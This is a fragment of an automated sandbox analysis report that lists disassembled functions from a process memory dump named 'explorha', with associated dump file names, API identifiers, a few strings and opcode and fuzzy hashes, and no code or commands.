                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00738829 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction ID: 50bdad8e34c835bb0765ae71663e6f2ed5228df12f95239f4e8e8a10f91fa281
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87012677A243252636552069BC066B717A99BC1BB4F2A003EFC44F72C3FFACDC425196
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00702DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 32384418-0
                                                                                                                                                                                                                                        • Opcode ID: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction ID: 7d773e6781a40ed6cfc29baadf67f964ef928868e095c97b246453030e31e832
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFA1E2B1A01216EFDB21DB68C94879AB7F8FF15354F004229E815D72C2EB38EA45CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070D6EE Relevance: 7.7, APIs: 5, Instructions: 235COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1418687624-0
                                                                                                                                                                                                                                        • Opcode ID: 55b3bb3b402a5a0fce369dcbd25e392bb08c26e2cde4161125d044a571dc128e
                                                                                                                                                                                                                                        • Instruction ID: d4d0e394292500eff0c75ef4c806bfa7eb144928a819cd833d6d03898969de9b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55b3bb3b402a5a0fce369dcbd25e392bb08c26e2cde4161125d044a571dc128e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0481C3B1A00315DBDB309F68CC49FAAB7E4EF08314F118369E919A72D1DB79AD44CB91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070DAEB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151023835.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151058621.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151144580.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151175401.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151203725.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151234734.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151261377.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151380748.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151409148.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151441167.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151473024.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151566498.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151599544.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151627064.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151654854.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151686222.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151710781.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151736052.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151766410.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151802690.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151830791.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock
                                                                                                                                                                                                                                        • String ID: invalid stoi argument$stoi argument out of range$Sv
                                                                                                                                                                                                                                        • API String ID: 1418687624-3838638389
                                                                                                                                                                                                                                        • Opcode ID: 07aa5d54842227f5a55edc4e91b2eae8cff60c400db8f8342432a23df00175fc
                                                                                                                                                                                                                                        • Instruction ID: 0584fe80cce110151903f1fed53c43b1be9808775ee1e71ae03a05098a947faa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07aa5d54842227f5a55edc4e91b2eae8cff60c400db8f8342432a23df00175fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B1182B2A00305DBCF30DFA8D846AA9F3F1EF54311F168565E906676A1EB39AC40CB51
                                                                                                                                                                                                                                        Uniqueness

